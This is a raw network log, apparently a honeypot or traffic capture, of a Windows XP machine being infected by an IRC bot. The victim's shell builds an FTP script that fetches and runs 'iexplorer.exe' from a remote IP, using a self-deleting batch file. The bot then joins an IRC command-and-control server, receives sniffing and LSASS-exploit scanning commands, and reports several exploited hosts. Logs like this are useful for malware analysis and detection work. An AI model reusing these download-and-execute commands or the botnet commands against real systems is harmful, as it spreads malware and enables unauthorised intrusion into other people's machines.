VICTIM: Microsoft Windows XP [Version 5.1.2600] VICTIM: (C) Copyright 1985-2001 Microsoft Corp.C:\\WINDOWS\\system32> VICTIM: echo open 121.114.154.123 4018>.pif C:\\WINDOWS\\system32> VICTIM: echo user a a>>.pif C:\\WINDOWS\\system32> VICTIM: echo binary>>.pif C:\\WINDOWS\\system32> VICTIM: echo GET iexplorer.exe>>.pif C:\\WINDOWS\\system32> VICTIM: echo bye>>.pif C:\\WINDOWS\\system32> VICTIM: echo @echo off >c.batC:\\WINDOWS\\system32> VICTIM: echo ftp -n -v -s:.pif >>c.batC:\\WINDOWS\\system32> VICTIM: echo iexplorer.exe >>c.batC:\\WINDOWS\\system32> VICTIM: echo del .pif >>c.batC:\\WINDOWS\\system32> VICTIM: echo del /F c.bat >>c.batC:\\WINDOWS\\system32> VICTIM: echo exit /y >>c.batC:\\WINDOWS\\system32> ATTACKER: 220 VICTIM: USER a ATTACKER: 331 VICTIM: PASS a ATTACKER: 230 VICTIM: TYPE I ATTACKER: 200 VICTIM: PORT 192,168,1,53,4, ATTACKER: 200 ATTACKER: RETR iexplorer.exe ATTACKER: 150 ATTACKER: 226 VICTIM: QUIT ATTACKER: 221 VICTIM: NICK `lckfpfdmUSER `lckfpfdm 0 0 :`lckfpfdm ATTACKER: :aaa.39213.com 001 `lckfpfdm :time, `lckfpfdm!~lckfpfdm@192.168.1.53:aaa.39213.com 005 `lckfpfdm MAP KNOCK SAFELIST HCN MAXCHANNELS=500 MAXBANS=60 NICKLEN=30 TOPICLEN=307 KICKLEN=307 MAXTARGETS=15 AWAYLEN=307 :are supported by this server:aaa.39213.com 005 `lckfpfdm WALLCHOPS WATCH=128 SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+ CHANMODES=be,kfL,l,psmntirRcOAQKVGCuzNSMT NETWORK=time CASEMAPPING=ascii EXTBAN=~,cqr :are supported by this server:aaa.39213.com 422 `lckfpfdm :MOTD File is missing:`lckfpfdm MODE `lckfpfdm :+i VICTIM: JOIN #.has hs VICTIM: USERHOST `lckfpfdmJOIN #.has hsUSERHOST `lckfpfdmJOIN #.has hsUSERHOST `lckfpfdm ATTACKER: :`lckfpfdm!~lckfpfdm@192.168.1.53 JOIN :#.has:aaa.39213.com 332 `lckfpfdm #.has :`i.join #.r |`sniff.on -s:aaa.39213.com 333 `lckfpfdm #.has s 1214865519:aaa.39213.com 353 `lckfpfdm @ #.has :`lckfpfdm @s :aaa.39213.com 366 `lckfpfdm #.has :End of /NAMES list.:aaa.39213.com 302 `lckfpfdm :`lckfpfdm=+~lckfpfdm@192.168.1.53 :aaa.39213.com 302 `lckfpfdm :`lckfpfdm=+~lckfpfdm@192.168.1.53 :aaa.39213.com 302 `lckfpfdm :`lckfpfdm=+~lckfpfdm@192.168.1.53 VICTIM: JOIN #.r ATTACKER: :`lckfpfdm!~lckfpfdm@192.168.1.53 JOIN :#.r:aaa.39213.com 332 `lckfpfdm #.r :`adv.start lsass 100 3 0 x.x.x.x -a -r -s |`adv.start lsass 100 3 0 -r -b -s:aaa.39213.com 333 `lckfpfdm #.r sd 1214838792:aaa.39213.com 353 `lckfpfdm @ #.r :`lckfpfdm @s :aaa.39213.com 366 `lckfpfdm #.r :End of /NAMES list. VICTIM: PRIVMSG #.lagja :lsass: exploited (127.123.232.154) VICTIM: PRIVMSG #.lagja :ftp: 192.168.1.53 on 713 ATTACKER: :aaa.39213.com 404 `lckfpfdm #.lagja :No external channel messages (#.lagja):aaa.39213.com 404 `lckfpfdm #.lagja :No external channel messages (#.lagja) VICTIM: PRIVMSG #.lagja :lsass: exploited (127.67.177.151) VICTIM: PRIVMSG #.lagja :ftp: 192.168.1.53 on 713 ATTACKER: :aaa.39213.com 404 `lckfpfdm #.lagja :No external channel messages (#.lagja):aaa.39213.com 404 `lckfpfdm #.lagja :No external channel messages (#.lagja) VICTIM: PRIVMSG #.#. :(85.179.193.80:19483)(10.2.32.216:1032) 220 - VICTIM: PRIVMSG #.#. :(10.2.32.216:1032)(85.179.193.80:19483) USER a PRIVMSG #.#. :(10.2.32.216:1032)(85.179.193.80:19483) PASS a ATTACKER: :aaa.39213.com 404 `lckfpfdm #.#. :No external channel messages (#.#.):aaa.39213.com 404 `lckfpfdm #.#. :No external channel messages (#.#.):aaa.39213.com 404 `lckfpfdm #.#. :No external channel messages (#.#.) VICTIM: PRIVMSG #.#. :(85.179.193.80:19483)(10.2.32.216:1032) 230 - ATTACKER: :aaa.39213.com 404 `lckfpfdm #.#. :No external channel messages (#.#.) VICTIM: PRIVMSG #.lagja :lsass: exploited (127.187.233.100) VICTIM: PRIVMSG #.lagja :lsass: exploited (127.187.233.100)PRIVMSG #.lagja :ftp: 192.168.1.53 on 713 VICTIM: PRIVMSG #.lagja :lsass: exploited (127.187.233.100)PRIVMSG #.lagja :ftp: 192.168.1.53 on 713 VICTIM: PRIVMSG #.lagja :lsass: exploited (127.187.233.100)PRIVMSG #.lagja :ftp: 192.168.1.53 on 713 VICTIM: PRIVMSG #.lagja :lsass: exploited (127.187.233.100)PRIVMSG #.lagja :ftp: 192.168.1.53 on 713 VICTIM: PRIVMSG #.lagja :lsass: exploited (127.187.233.100)PRIVMSG #.lagja :ftp: 192.168.1.53 on 713